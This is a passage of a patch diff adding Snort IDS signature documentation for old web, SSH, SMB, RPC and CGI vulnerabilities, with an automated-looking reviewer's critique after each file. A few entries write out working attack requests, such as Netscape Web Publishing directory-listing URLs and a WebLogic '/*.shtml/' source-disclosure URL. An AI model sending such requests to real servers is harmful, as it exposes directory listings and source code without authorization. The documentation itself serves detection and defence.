+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
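Review bot: Nothing in this file identifies what SID 1563 matches: the Summary is "a known vulnerability on a web server or a web application", Affected Systems is "All systems using a web server", Attack Scenarios is "from simple directory traversal to exploitation of buffer overflow conditions", and Additional References is empty. The paragraph beginning "Some applications do not perform stringent checks when validating the credentials" is the same boilerplate used by the CGI files in this patch. Name the script, path or content string the rule looks for and the product it belongs to, and add a reference; without that the False Positives entry "None known" cannot be evaluated.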
--- /dev/null
+++ b/doc/signatures/1514.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1514
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
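Review bot: Detailed Information, Attack Scenarios and Affected Systems are word for word the same as in 1534.txt and 1653.txt later in this patch, so this file says nothing specific about SID 1514: no CGI script name, no product, no reference. Add the script the rule matches on and the vulnerability in it. Typo: "running ona web server" (missing space), which the copies repeat.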
--- /dev/null
+++ b/doc/signatures/1386.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1386
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
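Review bot: Affected Systems is empty, and the Summary says only "a known vulnerability in Microsoft SQL"; name the product fully (Microsoft SQL Server) and the versions, and say what the rule matches, since Detailed Information covers both "server or client" and the Attack Scenarios text (accessing "the authentication mechanism" and supplying credentials) reads like a login attempt rather than an exploit. The Corrective Action line "Disallow administrative access from sources external to the protected network" is the one concrete statement here and suggests the rule fires on an administrative login; if so, False Positives should say that legitimate remote administration will trigger it rather than "None known."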
--- /dev/null
+++ b/doc/signatures/1812.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 1812
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with either the opportunity to
+execute arbitrary code with the privileges of the user running the SSH daemon (usually root) or a possible Denial of Service (DoS).
+
+--
+Detailed Information:
+OpenSSH versions prior to 3.3 contain a flaw that could allow a remote attacker to compromise a vulnerable SSH daemon via an integer overflow on systems with BSD_AUTH or SKEY options compiled and PAM authentication or Challenge Response Authentication enabled.
+
+Affected Systems:
+	OpenSSH versions 2.9 to 3.2
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Enable the privilege separation option in OpenSSH 3.3 if possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securityfocus:
+http://www.securityfocus.com/bid/5093
+
+--
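Review bot: The "--" separator before "Affected Systems:" is missing (Detailed Information runs straight into it after one blank line), so a parser keyed on the separators will merge the two sections; every other section in the file has one. The file also differs from the rest of the patch in putting the value on the same line as the field name ("Sid: 1812"). Spelling: "System compromize" should be "compromise". Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack and is not a scenario; describe the exchange instead, using the detail Detailed Information already gives (an integer overflow reached through the challenge-response or PAM authentication path on builds with BSD_AUTH or SKEY). Detailed Information says "OpenSSH versions prior to 3.3" while Affected Systems says "2.9 to 3.2"; the two agree only if nothing before 2.9 is affected, so state that explicitly.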
--- /dev/null
+++ b/doc/signatures/1534.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1534
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
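Review bot: Same generic CGI text as 1514.txt and 1653.txt (Detailed Information, Attack Scenarios and Affected Systems are identical, including the "running ona web server" typo), so nothing here identifies the script SID 1534 matches or the vulnerability in it, and Additional References is empty. Add the script name, the flaw, and a reference, or the three files cannot be told apart.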
--- /dev/null
+++ b/doc/signatures/3465.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3465
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script
+show.pl.
+
+--
+Impact:
+Use of script as an open proxy.
+
+--
+Detailed Information:
+RiSearch is a collection of cgi scripts written in Perl to facilitate
+web site search functionality. Some versions of the script show.pl do
+not correctly sanitize user input. This may present an attacker with the
+opportunity to use the script as an open proxy server, possibly in
+attempts to execute web attacks against other systems anonymously.
+
+Specifically, it may be possible for an attacker to supply their own
+input to the "uri" parameter.
+
+--
+Affected Systems:
+	RiSearch 0.99.8 and prior
+	RiSearch Pro 3.2.6
+
+--
+Attack Scenarios:
+An attacker can supply a URI of their choosing as a value for the
+uri parameter
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
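Review bot: False Positives "None known." is doubtful for a rule whose Summary says it fires "when an attempt is made to access the cgi script show.pl": ordinary users of a RiSearch-enabled site request show.pl in normal use. Either the rule also requires something in the "uri" parameter (an absolute URL to another host, which is what the open-proxy description implies) and Detailed Information should say so, or False Positives should state that normal use of the search script triggers the event. Corrective Action could add restricting the uri parameter to local paths, which is the mitigation the Detailed Information text points at, and Additional References is empty for a product with precisely named affected versions ("RiSearch 0.99.8 and prior", "RiSearch Pro 3.2.6").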
--- /dev/null
+++ b/doc/signatures/3048.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3048
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
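Review bot: Detailed Information never says which protocol dissector in Ethereal parses the access control list; Attack Scenarios narrows it to "large NT ACLs", so the protocol and the packet field the rule matches on should be named in Detailed Information as well, and a reference added to the empty Additional References section, since the cut-off "Ethereal 0.10.7 and prior" needs a source. Minor: "analyser" is the British spelling while the rest of the patch uses US spelling ("unauthorized"), so "analyzer" would be consistent.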
--- /dev/null
+++ b/doc/signatures/3038.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3038
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
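Review bot: Detailed Information and Attack Scenarios describe the flaw from two angles that the reader has to reconcile: the former says "an integer overflow" in "the allocation of memory", the latter says the attacker must "overflow a buffer containing the information for the access control lists". If, as the two together suggest, an integer overflow in the size computation yields an undersized allocation that the ACL data then overruns, say that once in Detailed Information and have Attack Scenarios refer to it. Also "server.The problem" is missing a space after the full stop, "heterogenous" should be "heterogeneous", and Additional References is empty although Affected Systems gives a precise cut-off ("Samba 3.0.8 and prior").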
--- /dev/null
+++ b/doc/signatures/1653.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1653
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If the webserver has pages or directories by the name of campus this rule will
+fire often.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Colin Harford <colin.harford@ualberta.ca>
+
+--
+Additional References:
+
+--
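Review bot: The only specific fact about SID 1653 in this file is buried in False Positives: "If the webserver has pages or directories by the name of campus this rule will fire often", which tells the reader the rule matches the string "campus"; the Summary, Detailed Information and Affected Systems are the generic CGI boilerplate shared with 1514.txt and 1534.txt (including the "running ona web server" typo). Move that fact up: say that the rule is for a CGI script named campus, what the vulnerability in it is, and add a reference, so the False Positives note has something to be a false positive of.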
--- /dev/null
+++ b/doc/signatures/100000706.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000706
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "index.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
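Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host...") describes an authentication weakness, not the remote file include through the "root" parameter of index.php named in the Summary; it reads as boilerplate from a different rule and should be replaced with what a remote include does, namely that the attacker-hosted file is executed by the PHP interpreter with the web server's privileges. Corrective Action should add the PHP-level mitigation that blocks this class of bug independently of the SmartSiteCMS version: allow_url_include=Off (and allow_url_fopen=Off where the application tolerates it) in php.ini. Wording: "an exploitation attempt has been attempted", "running ona web server".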
--- /dev/null
+++ b/doc/signatures/1186.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1186
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-ver-diff".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
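Review bot: Corrective Action says "To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8", but no denial of service is described in Impact or Detailed Information; either describe the DoS condition or drop the sentence. Detailed Information and Corrective Action also pull in opposite directions on indexing: the listing works on Netscape Enterprise Server "regardless of directory indexing settings", yet the remedy is "Disable directory indexing" with only a caveat that it "may not fix the problem"; say explicitly that on NES 3.x patching is the only fix and the indexing change helps only on iPlanet. Use a reserved example host (example.com) rather than http://www.sun.com/?wp-ver-diff.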
--- /dev/null
+++ b/doc/signatures/1190.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1190
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-uncheckout".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
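Review bot: apart from the command in the example URL (?wp-uncheckout instead of ?wp-ver-diff) this file is a verbatim copy of the SID 1186 documentation, including the unexplained "potential DOS vulnerability" sentence in Corrective Action. If the two rules differ only in the Web Publishing command matched, say so in Detailed Information so an analyst triaging both events knows they are the same issue, and fix the DoS sentence here as well rather than carrying the inconsistency forward.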
--- /dev/null
+++ b/doc/signatures/100000591.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000591
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"editor_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
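Review bot: Corrective Action ("Ensure the system is using an up to date version of the software") is the only remediation given, but for a remote file include the operator usually cannot wait for a vendor fix; add the mitigations that stop the attack regardless of the Indexu version: allow_url_include=Off (and allow_url_fopen=Off where possible) in php.ini, plus egress filtering from the web server so the interpreter cannot fetch the attacker's file. The paragraph about "validating the credentials of a client host" is boilerplate unrelated to an include via "admin_template_path" and should be removed.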
--- /dev/null
+++ b/doc/signatures/2139.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 2139
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerabliity in BEA Systems WebLogic server. 
+
+--
+Impact:
+Information gathering, source code disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a vulnerabliity in BEA Systems WebLogic server.
+
+A weakness in the configuration of the WebLogic server from BEA Systems allows an attacker to view the source code of .jsp and .jhtml pages that reside in the root directory of the webserver. A request for these documents prefixed with /*.shtml/ will exploit a vulnerability in the handling of Server Side Include Servlet (SSIServlet) such that the webserver will return the documents unparsed, rendering the source code viewable.
+
+--
+Affected Systems:
+BEA Systems WebLogic Enterprise 5.1 and 5.1.x
+
+--
+Attack Scenarios:
+An attacker can retrieve the source code of a .jsp file by making a web request in the form: http://www.foo.com/*.shtml/target.jsp.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
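Review bot: Additional References is empty for a vulnerability that has a vendor advisory and public write-ups; cite them, since "Apply the appropriate vendor supplied patches" is otherwise unactionable. Affected Systems lists "WebLogic Enterprise 5.1 and 5.1.x", which is one range stated twice; give the first fixed version instead. Attack Scenarios should note that the /*.shtml/ prefix applies equally to the .jhtml pages mentioned in Detailed Information, not only the .jsp example, and Corrective Action could mention removing the SSIServlet mapping where server-side includes are not used, since the text attributes the issue to that servlet's configuration. Typo: "vulnerabliity" (twice).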
--- /dev/null
+++ b/doc/signatures/3227.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3227
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
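Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes "a malformed request to an RPC port" causing the overflow; pick one trigger and describe it consistently, otherwise an analyst will look at SMB traffic while the rule is watching RPC. Additional References is empty; cite the Microsoft Security Bulletin for the patch named in Corrective Action. The firewall line says "ports 135, 139 and 445 for both TCP and UDP", but the NetBIOS session service on 139 is TCP, and the UDP NetBIOS ports 137 and 138 are not in the list; state the protocols per port so the recommendation translates into correct filter rules. Typo: "Expoit".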
--- /dev/null
+++ b/doc/signatures/3304.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3304
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
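Review bot: this file is identical to the SID 3227 documentation, so nothing tells the reader what distinguishes rule 3304 from 3227 (a different transport, a different operation, a different stage of the exchange?); Detailed Information should say what this rule specifically matches. Copying the text forward also copies the Attack Scenarios/Detailed Information mismatch (network share versus RPC port) and the empty Additional References.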
--- /dev/null
+++ b/doc/signatures/2088.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2088
+
+--
+Summary:
+vulnerability in the rcp service ypupdated.
+
+--
+Impact:
+Information disclosure and possible code execution.
+
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
